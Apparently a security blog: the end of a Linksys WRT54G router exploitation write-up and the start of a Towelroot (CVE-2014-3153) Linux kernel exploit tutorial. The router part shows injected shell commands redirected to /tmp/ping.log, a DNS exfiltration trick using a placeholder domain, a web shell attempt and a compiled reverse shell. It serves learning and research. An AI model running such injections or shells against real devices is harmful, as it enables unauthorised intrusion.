<li>Look for files that are displayed within the web interface and write my output to them.</li>
<li>Set myself as the router’s DNS server and force the router to issue DNS requests with the command output included.
For instance, <code class="language-plaintext highlighter-rouge">nslookup $(echo hello).fake.domain</code>, and then I’d receive a DNS Query request of <code class="language-plaintext highlighter-rouge">hello.fake.domain</code>.
However this method is less preferred because extracting the data programmatically from the DNS requests could be quite tedious.</li>
</ol>
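<p>For the DNS option in the list above, the receiving side does not have to be that tedious if the data is encoded predictably. The sketch below is an illustration of the idea only: it hex-encodes the bytes, splits them into labels, and decodes them back. The function names and the <code class="language-plaintext highlighter-rouge">fake.domain</code> suffix are placeholders, and it does not address how the router itself would produce the encoding with the few tools it has.</p>

```python
LABEL_LEN = 62  # even, so bytes never straddle labels; DNS allows up to 63


def to_dns_name(data: bytes, domain: str = "fake.domain") -> str:
    """Hex-encode data and split it into DNS labels under `domain`."""
    hex_data = data.hex()
    labels = [hex_data[i:i + LABEL_LEN] for i in range(0, len(hex_data), LABEL_LEN)]
    # Note: the 253-character limit on a full name is not enforced here.
    return ".".join(labels + [domain])


def from_dns_name(name: str, domain: str = "fake.domain") -> bytes:
    """Recover the original bytes from a name built by to_dns_name."""
    encoded = name[: -len(domain) - 1].replace(".", "")
    return bytes.fromhex(encoded)


name = to_dns_name(b"hello")
print(name)                 # 68656c6c6f.fake.domain
print(from_dns_name(name))  # b'hello'
```

<p>Hex is used because DNS names are case-insensitive and restricted in their character set, which rules out raw output or Base64.</p>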
<p>I started off by attempting to upload a web shell into the <code class="language-plaintext highlighter-rouge">www</code> directory.
When I browsed to it, the web server replied with <code class="language-plaintext highlighter-rouge">404 Not Found</code>. I inferred that the web server only responds to predefined constant paths like <code class="language-plaintext highlighter-rouge">/Ping.asp</code>,
and that it doesn’t simply look up the files within <code class="language-plaintext highlighter-rouge">www</code>.</p>
<p>With that in mind, I attempted to overwrite an existing page,
hoping I would now receive my own crafted page. I was surprised to see that it still served me the original one.
It seems that the server caches the pages in memory when <code class="language-plaintext highlighter-rouge">httpd</code> starts, and doesn’t reload them until a reboot occurs.</p>
<p>I then recalled the ping interface.<br />
The output was the exact output of the <code class="language-plaintext highlighter-rouge">ping</code> command.
I bet that it writes it to a file and that the web server reads from that file.</p>
<p>I opened my disassembler and looked for strings that contain both a <code class="language-plaintext highlighter-rouge">/</code>, indicating a file path, and <code class="language-plaintext highlighter-rouge">ping</code>.
<img src="https://i.imgur.com/znqjVnI.png" alt="Ping Log Ghidra" />
That’s it! <code class="language-plaintext highlighter-rouge">/tmp/ping.log</code> must be the one. Let’s test it.</p>
<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">In</span> <span class="p">[</span><span class="mi">1</span><span class="p">]:</span> <span class="n">r</span> <span class="o">=</span> <span class="n">Router</span><span class="p">(</span><span class="s">'192.169.1.1'</span><span class="p">,</span> <span class="p">(</span><span class="s">'admin'</span><span class="p">,</span> <span class="s">'waddup'</span><span class="p">))</span>
<span class="n">In</span> <span class="p">[</span><span class="mi">2</span><span class="p">]:</span> <span class="n">r</span><span class="p">.</span><span class="n">_run_shell_cmd</span><span class="p">(</span><span class="s">'ps'</span><span class="p">,</span> <span class="n">with_output</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
<span class="p">[</span><span class="o">*</span><span class="p">]</span> <span class="n">Running</span><span class="p">:</span> <span class="p">;</span><span class="n">ps</span><span class="o">>/</span><span class="n">tmp</span><span class="o">/</span><span class="n">ping</span><span class="p">.</span><span class="n">log</span> <span class="mi">2</span><span class="o">>&</span><span class="mi">1</span><span class="p">;</span>
<span class="p">[</span><span class="o">*</span><span class="p">]</span> <span class="n">Issuing</span> <span class="n">a</span> <span class="n">firmware</span> <span class="n">upgrade</span><span class="p">.</span>
</code></pre></div></div>
<p><img src="https://i.imgur.com/1cdJgez.png" alt="Ping Log Output" /></p>
<p>Awesome! We can now see the output of our commands.<br />
We can even see ourselves with PID 540 🙃</p>
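<p>The payload in the log line above is just the command with its output redirected into the file that the ping page displays. A minimal reconstruction of that wrapping is shown below; <code class="language-plaintext highlighter-rouge">wrap_with_output</code> is a hypothetical name and not necessarily how <code class="language-plaintext highlighter-rouge">_run_shell_cmd</code> is implemented.</p>

```python
PING_LOG = "/tmp/ping.log"  # file whose contents the ping page shows


def wrap_with_output(command: str) -> str:
    """Build the ui_language value that runs `command` and captures its output."""
    # 2>&1 sends stderr to the same file, so error messages show up as well.
    return f";{command}>{PING_LOG} 2>&1;"


print(wrap_with_output("ps"))  # ;ps>/tmp/ping.log 2>&1;
```

<p>The redirection itself costs 19 characters, which leaves noticeably less room for the command within the <code class="language-plaintext highlighter-rouge">snprintf</code> limit.</p>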
<p>Next thing I did was run <code class="language-plaintext highlighter-rouge">ls /tmp</code> to ensure the reverse shell is in fact there and is executable,<br />
which it was.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>drwxr-xr-x 1 0 0 0 Jan 1 2000 var
lrwxrwxrwx 1 0 0 8 Jan 1 00:00 ldhclnt -> /sbin/rc
drwx------ 1 0 0 0 Jan 1 00:00 cron.d
-rw-r--r-- 1 0 0 8 Jan 1 01:22 action
-rw-r--r-- 1 0 0 36 Jan 1 00:00 crontab
-rw-r--r-- 1 0 0 88 Jan 1 02:33 udhcpd.leases
-rw-r--r-- 1 0 0 287 Jan 1 00:00 udhcpd.conf
-rw-r--r-- 1 0 0 40 Jan 1 00:00 nas.lan.conf
-rw-r--r-- 1 0 0 27 Jan 1 00:00 ses.log
lrwxrwxrwx 1 0 0 8 Jan 1 00:00 udhcpc -> /sbin/rc
-rw-r--r-- 1 0 0 33 Jan 1 00:00 nas.wan.conf
-rw-r--r-- 1 0 0 1 Jan 1 00:00 udhcpc.expires
-rw-r--r-- 1 0 0 1.7k Jan 1 00:00 .ipt
-rw-r--r-- 1 0 0 20 Jan 1 00:00 .out_rule
-rw-r--r-- 1 0 0 3.0k Jan 1 02:33 Success_u_s.asp
-rw-r--r-- 1 0 0 1.5k Jan 1 02:33 Fail_u_s.asp
-rwxr-xr-x 1 0 0 0 Jan 1 00:09 X
-rw-r--r-- 1 0 0 0 Jan 1 01:22 ping.log
drwxr-xr-x 1 503 503 76 Feb 8 2012 ..
drwxr-xr-x 1 0 0 0 Jan 1 2000 .
</code></pre></div></div>
<p>I tried running it and got a <code class="language-plaintext highlighter-rouge">SIGSEGV</code> in my ping log.
It seems I had failed to compile the reverse shell correctly for the target.</p>
<h1 id="compiling">Compiling</h1>
<p>It’s crucial for me to state that I wanted to be able to compile and run my <strong>own program</strong>.<br />
That is why I did not attempt beforehand to deploy a reverse shell using <code class="language-plaintext highlighter-rouge">bash</code>, <code class="language-plaintext highlighter-rouge">nc</code>, <code class="language-plaintext highlighter-rouge">python</code>, <code class="language-plaintext highlighter-rouge">perl</code>, etc.
Even if I had wanted to, none of those were available on the system anyway.</p>
<p>Throughout the process I learned that MIPS, the architecture the router runs on, comes in many different variations,
and compiling a program to run on the device turned out to be a bigger challenge than I expected.</p>
<p>When I set out to compile <code class="language-plaintext highlighter-rouge">revshell.c</code>,
I thought that all I’d have to do was install <code class="language-plaintext highlighter-rouge">gcc</code> for MIPS, so I just ran <code class="language-plaintext highlighter-rouge">mips-linux-gnu-gcc -static revshell.c -o revshell</code>, but boy was I wrong.
I tried passing various arguments to the compiler and using different compilers, but none of the resulting binaries ran successfully on the router.
I also tried assembling native MIPS code directly with <code class="language-plaintext highlighter-rouge">as</code>.</p>
<p>Eventually I learned that the vendor publishes a <a href="https://www.linksys.com/us/support-article?articleNum=114663">toolchain</a> containing a bunch of tools that are relevant to the device,
among them the compiler that is used to build programs for the target.</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>/opt/brcm/hndtools-mipsel-linux/bin/mipsel-linux-gcc <span class="nt">-s</span> <span class="nt">-static</span> revshell.c <span class="nt">-o</span> revshell
<span class="nv">$ </span>file revshell
revshell: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 <span class="o">(</span>SYSV<span class="o">)</span>, statically linked, <span class="k">for </span>GNU/Linux 2.2.15, stripped
</code></pre></div></div>
<p>Let’s experiment and see if this toolchain is any good.</p>
<center><iframe style="width: 720px; height: 400px; margin: 0.5rem" src="https://www.youtube.com/embed/P015AjNWvW8" frameborder="0" allowfullscreen=""></iframe></center>
<p>Mission accomplished! Full interactive shell.<br />
The repository of the exploit is available <a href="https://github.com/elongl/linksys-wrt54g">here</a>.</p>
<p>Thank you for reading.</p>
<p>Exploiting CVE-2014-3153 (Towelroot), 2021-01-08, https://elongl.github.io/exploitation/2021/01/08/cve-2014-3153</p>
<h1 id="understanding-the-kernel">Understanding The Kernel</h1>
<p>For quite some time now, I’ve been wanting to unveil the internals of modern operating systems.<br />
I didn’t like how the most basic and fundamental level of a computer was so abstract to me,<br />
and that I did not <em>truly</em> grasp how some of it works; it was a “black box” to me.</p>
<p>I’ve always been more than familiar with kernel and OS concepts,<br />
but there’s a big gap between comprehending them as a user and as a kernel hacker.<br />
<strong>I wanted to see code, not words.</strong></p>
<p>In order to tackle that,
I decided to take on a small kernel exploit <a href="https://github.com/elongl/pwnable.kr/tree/master/syscall">challenge</a>, and in parallel read <a href="https://books.google.co.il/books/about/Linux_Kernel_Development.html?id=3MWRMYRwulIC">Linux Kernel Development</a>.
Initially, the thought of reading the kernel’s code seemed a bit spooky, <em>“I wouldn’t understand a thing”</em>.
Little by little, it became less intimidating, and honestly, it turned out to be quite a bit easier than I expected.</p>
<p>Now, I feel tenfold more comfortable simply looking something up in the source in order to understand how it works,
rather than searching man pages endlessly or consulting other people.</p>
<p><img src="https://i.imgur.com/vJP3B8i.png" alt="Linux Kernel Image" /></p>
<h1 id="kernel-exploitation">Kernel Exploitation</h1>
<p>The book was really nice and all, but I wanted to get my hands dirty.<br />
I searched for a disclosed vulnerability within the Linux kernel,<br />
my plan being that I’d read its plain description and develop my own exploit for it.<br />
A friend recommended <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3153">CVE-2014-3153</a>, also known as <em>Towelroot</em>, and I just went for it.<br />
Back in the day, it was very commonly used to root Android devices.</p>
<h1 id="fast-userspace-mutex">Fast Userspace Mutex</h1>
<p>The vulnerability is based around a mechanism called <em>Futex</em> within the kernel.<br />
Futex being a wordplay on <em>Fast userspace Mutex</em>.</p>
<p>The Linux kernel provides futexes as a building block for implementing userspace locking.<br />
A Futex is identified by a piece of memory which can be shared
between processes or threads. In its bare form, a
Futex is a counter that can be incremented and decremented atomically
and processes can wait for its value to become positive.</p>
<p>Futex operation occurs entirely in userspace for the noncontended case.<br />
The kernel is involved only to arbitrate the contended case.<br />
Lock contention is a state where a thread attempts to acquire a lock that is already held by another thread.</p>
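<p>To make the noncontended case concrete, here is a minimal sketch of the fast path only, assuming a lock word where <code class="language-plaintext highlighter-rouge">0</code> means free and <code class="language-plaintext highlighter-rouge">1</code> means held.
The <code class="language-plaintext highlighter-rouge">sketch_lock</code> type and its helpers are hypothetical names made up for illustration, they are not part of glibc or the kernel.
A real lock would fall back to <code class="language-plaintext highlighter-rouge">futex()</code> when the compare-and-swap fails, which is deliberately left out here.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;assert.h&gt;
#include &lt;stdatomic.h&gt;
#include &lt;stdbool.h&gt;

/* Hypothetical lock word: 0 = free, 1 = held. Not a kernel or glibc type. */
typedef struct { atomic_int word; } sketch_lock;

/* Fast path: a single atomic compare-and-swap, no syscall involved. */
static bool sketch_trylock(sketch_lock *l)
{
    int expected = 0;
    return atomic_compare_exchange_strong(&amp;l-&gt;word, &amp;expected, 1);
}

/* With nobody waiting, releasing is a plain userspace store as well. */
static void sketch_unlock(sketch_lock *l)
{
    assert(atomic_load(&amp;l-&gt;word) == 1); /* the lock must be held */
    atomic_store(&amp;l-&gt;word, 0);
}
</code></pre></div></div>
<p>A second <code class="language-plaintext highlighter-rouge">sketch_trylock()</code> on a held lock returns <code class="language-plaintext highlighter-rouge">false</code>; that failure is the contended case where the kernel would step in.</p>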
<blockquote>
<p>The futex() system call provides a method for waiting until a
certain condition becomes true. It is typically used as a
blocking construct in the context of shared-memory
synchronization. When using futexes, the majority of the
synchronization operations are performed in user space. A user-
space program employs the futex() system call only when it is
likely that the program has to block for a longer time until the
condition becomes true. Other futex() operations can be used to
wake any processes or threads waiting for a particular condition.</p>
</blockquote>
<p>I will cover <strong>only</strong> the terms and concepts related to the exploitation.<br />
For deeper insight into futexes, please refer to <a href="https://man7.org/linux/man-pages/man2/futex.2.html">man futex(2)</a> and <a href="https://man7.org/linux/man-pages/man7/futex.7.html">man futex(7)</a>.<br />
I strongly suggest messing around with the examples in order to assess your understanding.</p>
<p>The <code class="language-plaintext highlighter-rouge">futex()</code> syscall isn’t typically used by “everyday” programs, but rather by system libraries such as <code class="language-plaintext highlighter-rouge">pthreads</code> that wrap its usage.
That’s why the syscall doesn’t have a glibc wrapper like most syscalls do.
In order to call it, one has to use <code class="language-plaintext highlighter-rouge">syscall(SYS_futex, ...)</code>.</p>
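<p>As a rough sketch of what such a call looks like on Linux, the hypothetical helper <code class="language-plaintext highlighter-rouge">futex_call()</code> below simply forwards its arguments to <code class="language-plaintext highlighter-rouge">syscall(SYS_futex, ...)</code>.
The helper names are my own assumptions for illustration; only the syscall and the <code class="language-plaintext highlighter-rouge">FUTEX_*</code> constants come from the system headers.
The second function shows that <code class="language-plaintext highlighter-rouge">FUTEX_WAIT</code> only sleeps when the futex word still holds the expected value, otherwise it fails with <code class="language-plaintext highlighter-rouge">EAGAIN</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;assert.h&gt;
#include &lt;errno.h&gt;
#include &lt;linux/futex.h&gt;
#include &lt;stdint.h&gt;
#include &lt;sys/syscall.h&gt;
#include &lt;time.h&gt;
#include &lt;unistd.h&gt;

/* Hypothetical helper; glibc provides no futex() wrapper of its own. */
static long futex_call(uint32_t *uaddr, int op, uint32_t val,
                       const struct timespec *timeout,
                       uint32_t *uaddr2, uint32_t val3)
{
    assert(uaddr != NULL);
    return syscall(SYS_futex, uaddr, op, val, timeout, uaddr2, val3);
}

/*
 * FUTEX_WAIT only sleeps if *uaddr still equals val. Here it does not,
 * so the call fails right away and we return the errno it set.
 */
static int wait_with_stale_value(void)
{
    uint32_t word = 1;
    long ret = futex_call(&amp;word, FUTEX_WAIT, 0, NULL, NULL, 0);
    return ret == -1 ? errno : 0;
}
</code></pre></div></div>
<p>The same helper can issue any other operation, for example <code class="language-plaintext highlighter-rouge">futex_call(&amp;word, FUTEX_WAKE, 1, NULL, NULL, 0)</code>, which returns the number of waiters it woke.</p>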
<p>Due to the blocking nature of <code class="language-plaintext highlighter-rouge">futex()</code> and it being a way to synchronize between different tasks,<br />
you’ll notice that the exploit deals a lot with threads, which can get slightly confusing unless approached slowly.</p>
<p>There are two core concepts to understand about futexes in general, which we’ll talk a lot about.</p>
<p>The first is something called a <em>waiters list</em>, also known as the <em>wait queue</em>.<br />
This term refers to the blocked threads that are currently waiting for a lock to be released.<br />
It is held in kernelspace and programs can issue syscalls to carry out operations on it.
For instance, attempting to lock a contended lock results in the insertion of a waiter,
while releasing a lock pops a waiter from the list and reschedules its task.</p>
<p>The second is that there are two kinds of futexes: PI & non-PI.<br />
PI stands for <a href="https://en.wikipedia.org/wiki/Priority_inheritance">Priority Inheritance</a>.</p>
<blockquote>
<p>Priority inheritance is a mechanism for dealing with the
priority-inversion problem. With this mechanism, when a high-
priority task becomes blocked by a lock held by a low-priority
task, the priority of the low-priority task is temporarily raised
to that of the high-priority task, so that it is not preempted by
any intermediate level tasks, and can thus make progress toward
releasing the lock.</p>
</blockquote>
<p>This introduces the ability to prioritize waiters among the futex’s waiters list.<br />
A higher-priority task is guaranteed to get the lock before a lower-priority task.<br />
Non-PI operations, for instance, make no such guarantee.</p>
<blockquote>
<p>FUTEX_WAKE<br />
This operation wakes at most val of the waiters that are
waiting (e.g., inside FUTEX_WAIT) on the futex word at the
address uaddr. Most commonly, val is specified as either
1 (wake up a single waiter) or INT_MAX (wake up all
waiters). No guarantee is provided about which waiters
are awoken (e.g., a waiter with a higher scheduling
priority is <strong>not guaranteed</strong> to be awoken in preference to a
waiter with a lower priority).</p>
</blockquote>
<p>Both non-PI and PI futex types are used within the exploit.<br />
PI futexes are implemented using what the kernel calls a <em>plist</em>, a priority-sorted list.<br />
If you don’t know what it is, you could take a look <a href="https://elixir.bootlin.com/linux/v3.11.4/source/include/linux/plist.h#L46">here</a>,
though this image sums it up perfectly.</p>
<p><img src="https://i.imgur.com/IBxItuz.png" alt="Priority List Image" /></p>
<p style="text-align: center; font-style: italic"><small>All images are copied from Appdome.</small></p>
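<p>The ordering rule is easy to model outside the kernel. Below is a simplified sketch, assuming a singly linked list instead of the kernel’s doubly linked <code class="language-plaintext highlighter-rouge">plist_node</code>.
The names <code class="language-plaintext highlighter-rouge">sketch_waiter</code> and <code class="language-plaintext highlighter-rouge">sketch_plist_add()</code> are hypothetical; only the behaviour (ascending priority value, first-in-first-out among equal priorities) is meant to mirror a plist.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;assert.h&gt;
#include &lt;stddef.h&gt;

/* Hypothetical stand-in for a waiter; the kernel's plist_node is more involved. */
struct sketch_waiter {
    int prio;                    /* lower value = higher priority */
    struct sketch_waiter *next;
};

/*
 * Insert node so the list stays sorted by ascending prio.
 * A new node lands after existing nodes of equal prio (FIFO among equals).
 */
static void sketch_plist_add(struct sketch_waiter **head,
                             struct sketch_waiter *node)
{
    assert(head != NULL &amp;&amp; node != NULL);
    while (*head != NULL &amp;&amp; (*head)-&gt;prio &lt;= node-&gt;prio)
        head = &amp;(*head)-&gt;next;
    node-&gt;next = *head;
    *head = node;
}
</code></pre></div></div>
<p>Adding waiters with priorities 120, 100 and 120 in that order leaves the 100 waiter at the head, followed by the two 120 waiters in arrival order.</p>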
<h1 id="bug--vulnerability">Bug & Vulnerability</h1>
<p>Here’s the CVE description.</p>
<blockquote>
<p>The futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5
does not ensure that calls have two different futex addresses, which allows local users to gain privileges
via a crafted FUTEX_REQUEUE command that facilitates unsafe waiter modification.</p>
</blockquote>
<p>Let’s break it down.<br />
First, we need to understand what a requeue operation is in the context of futexes.<br />
A waiter (a blocked thread) that is contending on a lock
can be “requeued” by a running thread, which tells it to wait on a different lock instead of the one it currently waits on.</p>
<p>A waiter on a non-PI futex can be requeued to either a different non-PI futex, or to a PI-futex.<br />
A waiter on a PI-futex cannot be requeued.<br />
The bug itself is that there are <strong>no validations whatsoever on requeuing from a futex to itself</strong>.</p>
<p>This allows us to requeue a PI-futex waiter to itself, which clearly violates the following policy.</p>
<blockquote>
<p>FUTEX_CMP_REQUEUE_PI<br />
Requeues waiters that are blocked via
FUTEX_WAIT_REQUEUE_PI on uaddr from a <strong>non-PI source</strong> futex
(uaddr) to a <strong>PI target</strong> futex (uaddr2).</p>
</blockquote>
<p>Take a look at the <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e9c243a5a6de0be8e584c604d353412584b592f8">bug fix commit</a>, both the description and the code changes.</p>
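<p>One harmless way to see the effect of that fix is to ask the kernel for a self-requeue on a futex that has no waiters at all.
The sketch below is an assumption-laden probe, not part of the exploit: <code class="language-plaintext highlighter-rouge">self_requeue_pi_errno()</code> is a hypothetical helper, and I would expect a kernel carrying the fix to reject the call with <code class="language-plaintext highlighter-rouge">EINVAL</code>, while other environments may report a different error.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;assert.h&gt;
#include &lt;errno.h&gt;
#include &lt;linux/futex.h&gt;
#include &lt;stdint.h&gt;
#include &lt;sys/syscall.h&gt;
#include &lt;unistd.h&gt;

/*
 * Ask the kernel to requeue-PI from a futex onto itself.
 * Returns 0 if the call was accepted, otherwise the errno it failed with.
 * Nobody waits on the word, so there is nothing to move either way.
 */
static int self_requeue_pi_errno(void)
{
    uint32_t word = 0;
    /* nr_wake = 1, nr_requeue = 1 (passed in the timeout slot), val3 = expected *uaddr */
    long ret = syscall(SYS_futex, &amp;word, FUTEX_CMP_REQUEUE_PI, 1, 1UL, &amp;word, 0);
    assert(ret &gt;= -1);
    return ret == -1 ? errno : 0;
}
</code></pre></div></div>
<p>Source and target are the same address here, which is exactly the combination the patched <code class="language-plaintext highlighter-rouge">futex_requeue()</code> refuses.</p>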
<p>So what actually happens when you requeue a waiter to itself? Good question.</p>
<p>Before actually diving into the exploit, here is a rough overview of how it works, for context further on.
Ultimately, what this bug gives us is a <strong>dangling waiter</strong> within the futex’s waiters list.
The way the exploit does that is as follows:</p>
<table>
<tbody>
<tr>
<td><strong>Step</strong></td>
<td><strong>Operation</strong></td>
<td><strong>Description</strong></td>
</tr>
<tr>
<td>1.</td>
<td><code class="language-plaintext highlighter-rouge">FUTEX_LOCK_PI</code></td>
<td>Lock a PI futex.</td>
</tr>
<tr>
<td>2.</td>
<td><code class="language-plaintext highlighter-rouge">FUTEX_WAIT_REQUEUE_PI</code></td>
<td>Wait on a non-PI futex, with the intention of being requeued to the PI futex.</td>
</tr>
<tr>
<td>3.</td>
<td><code class="language-plaintext highlighter-rouge">FUTEX_CMP_REQUEUE_PI</code></td>
<td>Requeue the non-PI futex waiter onto the PI futex.</td>
</tr>
<tr>
<td>4.</td>
<td>Userspace Overwrite</td>
<td>Set the PI futex’s value to <code class="language-plaintext highlighter-rouge">0</code> so that the kernel treats it as if the lock is available.</td>
</tr>
<tr>
<td>5.</td>
<td><code class="language-plaintext highlighter-rouge">FUTEX_CMP_REQUEUE_PI</code></td>
<td>Requeue the PI futex waiter to <strong>itself</strong>.</td>
</tr>
</tbody>
</table>
<p>And now we’ll understand why this results in a dangling waiter.</p>
<p>There are a lot of different data types within the futex implementation code.<br />
In order to cope with that, I made somewhat of a <a href="https://github.com/elongl/CVE-2014-3153/blob/master/notes.md#data-structures">summary of them</a> to help me keep track of what’s going on.
Feel free to use it as needed.</p>
<p><strong>Step 1</strong></p>
<p>We start off by locking the PI-futex.
We do that because we want the first requeue (step 3) to block and create a waiter on the waiters list, rather than acquire the lock immediately.
That waiter is destined to be our dangling waiter later on in the exploit.</p>
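<p>For reference, this is roughly what locking a PI futex looks like from userspace. It is a minimal sketch, assuming Linux with PI futex support, and <code class="language-plaintext highlighter-rouge">pi_lock_records_owner()</code> is a hypothetical helper name.
It shows that the kernel records the owner’s thread ID in the futex word, which is why a word of <code class="language-plaintext highlighter-rouge">0</code> reads as “unlocked” in step 4.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;assert.h&gt;
#include &lt;linux/futex.h&gt;
#include &lt;stdint.h&gt;
#include &lt;sys/syscall.h&gt;
#include &lt;unistd.h&gt;

/*
 * Lock an uncontended PI futex through the kernel and report whether the
 * futex word now names the calling thread as owner. Returns 1 if it does,
 * 0 if it does not, and -1 if FUTEX_LOCK_PI itself failed.
 */
static int pi_lock_records_owner(void)
{
    uint32_t word = 0;                            /* 0 means "unlocked" */
    uint32_t tid = (uint32_t)syscall(SYS_gettid);

    if (syscall(SYS_futex, &amp;word, FUTEX_LOCK_PI, 0, NULL, NULL, 0) != 0)
        return -1;

    int owned = (word &amp; FUTEX_TID_MASK) == tid;

    /* Release again so the thread does not exit while holding the lock. */
    long ret = syscall(SYS_futex, &amp;word, FUTEX_UNLOCK_PI, 0, NULL, NULL, 0);
    assert(ret == 0);
    return owned;
}
</code></pre></div></div>
<p>In the exploit the lock is of course <em>not</em> released at this point, since the whole purpose of step 1 is to keep it held.</p>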
<p><strong>Step 2</strong></p>
<p>In order to requeue a waiter from a non-PI futex to a PI futex, we first have to invoke <code class="language-plaintext highlighter-rouge">FUTEX_WAIT_REQUEUE_PI</code> on the non-PI futex,
which in turn translates to the <a href="https://elixir.bootlin.com/linux/v3.11.4/source/kernel/futex.c#L2285"><code class="language-plaintext highlighter-rouge">futex_wait_requeue_pi()</code></a> function.<br />
This function takes a non-PI futex to wait on (as with <code class="language-plaintext highlighter-rouge">FUTEX_WAIT</code>),
along with a PI futex that the waiter can <em>potentially</em> be requeued to by a later <code class="language-plaintext highlighter-rouge">FUTEX_CMP_REQUEUE_PI</code> command.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">futex_wait_requeue_pi</span><span class="p">(</span><span class="n">u32</span> <span class="n">__user</span> <span class="o">*</span><span class="n">uaddr</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">flags</span><span class="p">,</span>
<span class="n">u32</span> <span class="n">val</span><span class="p">,</span> <span class="n">ktime_t</span> <span class="o">*</span><span class="n">abs_time</span><span class="p">,</span> <span class="n">u32</span> <span class="n">bitset</span><span class="p">,</span>
<span class="n">u32</span> <span class="n">__user</span> <span class="o">*</span><span class="n">uaddr2</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">struct</span> <span class="n">hrtimer_sleeper</span> <span class="n">timeout</span><span class="p">,</span> <span class="o">*</span><span class="n">to</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">rt_mutex_waiter</span> <span class="n">rt_waiter</span><span class="p">;</span> <span class="c1">// <-- Important</span>
<span class="k">struct</span> <span class="n">rt_mutex</span> <span class="o">*</span><span class="n">pi_mutex</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">futex_hash_bucket</span> <span class="o">*</span><span class="n">hb</span><span class="p">;</span>
<span class="k">union</span> <span class="n">futex_key</span> <span class="n">key2</span> <span class="o">=</span> <span class="n">FUTEX_KEY_INIT</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">futex_q</span> <span class="n">q</span> <span class="o">=</span> <span class="n">futex_q_init</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">res</span><span class="p">,</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">...</span>
</code></pre></div></div>
<p>The function defines various local variables, the most important of which is the <code class="language-plaintext highlighter-rouge">rt_waiter</code> variable.<br />
Unsurprisingly, this variable is our waiter.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">rt_mutex_waiter</span> <span class="p">{</span>
<span class="k">struct</span> <span class="n">plist_node</span> <span class="n">list_entry</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">plist_node</span> <span class="n">pi_list_entry</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">task_struct</span> <span class="o">*</span><span class="n">task</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">rt_mutex</span> <span class="o">*</span><span class="n">lock</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>
<p>It contains the <code class="language-plaintext highlighter-rouge">lock</code> that it waits on,
it holds references to other waiters in the waiters list through the <code class="language-plaintext highlighter-rouge">list_entry</code> plist node,
and on top of that it also has a pointer to the <code class="language-plaintext highlighter-rouge">task</code> that it currently blocks.</p>
<p>It goes without saying that these locals live on the kernel stack,
but it is worth stating explicitly because it becomes crucial shortly.</p>
<p>Later on, it initializes the futex queue entry and enqueues it.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="n">q</span><span class="p">.</span><span class="n">bitset</span> <span class="o">=</span> <span class="n">bitset</span><span class="p">;</span>
<span class="n">q</span><span class="p">.</span><span class="n">rt_waiter</span> <span class="o">=</span> <span class="o">&</span><span class="n">rt_waiter</span><span class="p">;</span>
<span class="n">q</span><span class="p">.</span><span class="n">requeue_pi_key</span> <span class="o">=</span> <span class="o">&</span><span class="n">key2</span><span class="p">;</span>
<span class="p">...</span>
<span class="cm">/* Queue the futex_q, drop the hb lock, wait for wakeup. */</span>
<span class="n">futex_wait_queue_me</span><span class="p">(</span><span class="n">hb</span><span class="p">,</span> <span class="o">&</span><span class="n">q</span><span class="p">,</span> <span class="n">to</span><span class="p">);</span>
</code></pre></div></div>
<p>Note how it sets the <code class="language-plaintext highlighter-rouge">requeue_pi_key</code> to the futex key of the target futex.<br />
This is part of what allows us to self-requeue. We’ll see this in the final step.</p>
<p>At this point in the code, the function simply blocks and does not continue unless:</p>
<ol>
<li>A wakeup occurs.</li>
<li>The process is killed.</li>
</ol>
<p><strong>Step 3</strong></p>
<p>Next up, <a href="https://elixir.bootlin.com/linux/v3.11.4/source/kernel/futex.c#L1264"><code class="language-plaintext highlighter-rouge">futex_requeue()</code></a> is called by the <code class="language-plaintext highlighter-rouge">FUTEX_CMP_REQUEUE_PI</code> operation in another thread in order to do the heavy lifting of actually requeuing the waiter.
This is the <strong>vulnerable</strong> and most important function in the exploit.
The function is fairly long, so I’m not going to review all of its logic and will only address the relevant parts.<br />
I do encourage you to skim over it and try to get a grasp of what it does.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">futex_requeue</span><span class="p">(</span><span class="n">u32</span> <span class="n">__user</span> <span class="o">*</span><span class="n">uaddr1</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">flags</span><span class="p">,</span>
<span class="n">u32</span> <span class="n">__user</span> <span class="o">*</span><span class="n">uaddr2</span><span class="p">,</span> <span class="kt">int</span> <span class="n">nr_wake</span><span class="p">,</span> <span class="kt">int</span> <span class="n">nr_requeue</span><span class="p">,</span>
<span class="n">u32</span> <span class="o">*</span><span class="n">cmpval</span><span class="p">,</span> <span class="kt">int</span> <span class="n">requeue_pi</span><span class="p">)</span>
<span class="p">{</span>
<span class="p">...</span>
